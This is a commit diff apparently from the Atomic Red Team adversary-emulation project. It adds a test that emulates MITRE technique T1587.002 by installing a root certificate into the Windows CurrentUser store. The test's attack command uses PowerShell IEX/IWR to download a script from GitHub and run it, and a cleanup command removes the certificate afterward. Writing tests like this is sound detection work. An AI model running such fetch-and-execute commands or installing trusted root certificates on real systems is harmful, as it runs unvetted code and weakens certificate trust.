Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-31 20:37:38 +00:00
parent 6618ffa41a
commit 17a758ade1
6 changed files with 67 additions and 4 deletions
@@ -964,6 +964,7 @@ discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
+resource-development,T1587.002,Code Signing Certificates,1,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 resource-development,T1588.002,Tool,1,Run NirSoft AdvancedRun,f7d43d35-d628-4582-bb03-01b1c5e10d11,powershell
 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
@@ -1499,7 +1499,8 @@
 - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1587.002 Code Signing Certificates](../../T1587.002/T1587.002.md)
+  - Atomic Test #1: Add Root Certificate to CurrentUser Certificate Store [windows]
 - T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -60488,7 +60488,23 @@ resource-development:
      x_mitre_is_subtechnique: true
      x_mitre_platforms:
      - PRE
-    atomic_tests: []
+      identifier: T1587.002
+    atomic_tests:
+    - name: Add Root Certificate to CurrentUser Certificate Store
+      auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+      description: |
+        The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+        Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+        Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+      supported_platforms:
+      - windows
+      executor:
+        command: "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1587.002/src/RemoteCertTrust.ps1'
+          -UseBasicParsing) \n"
+        cleanup_command: "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint
+          -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n"
+        name: powershell
+        elevation_required: true
  T1588.003:
    technique:
      created: '2020-10-01T02:11:47.237Z'
@@ -0,0 +1,45 @@
+# T1587.002 - Code Signing Certificates
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1587/002)
+<blockquote>Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
+
+Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Add Root Certificate to CurrentUser Certificate Store](#atomic-test-1---add-root-certificate-to-currentuser-certificate-store)
+
+
+<br/>
+
+## Atomic Test #1 - Add Root Certificate to CurrentUser Certificate Store
+The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1587.002/src/RemoteCertTrust.ps1' -UseBasicParsing)
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
+```
+
+
+
+
+
+<br/>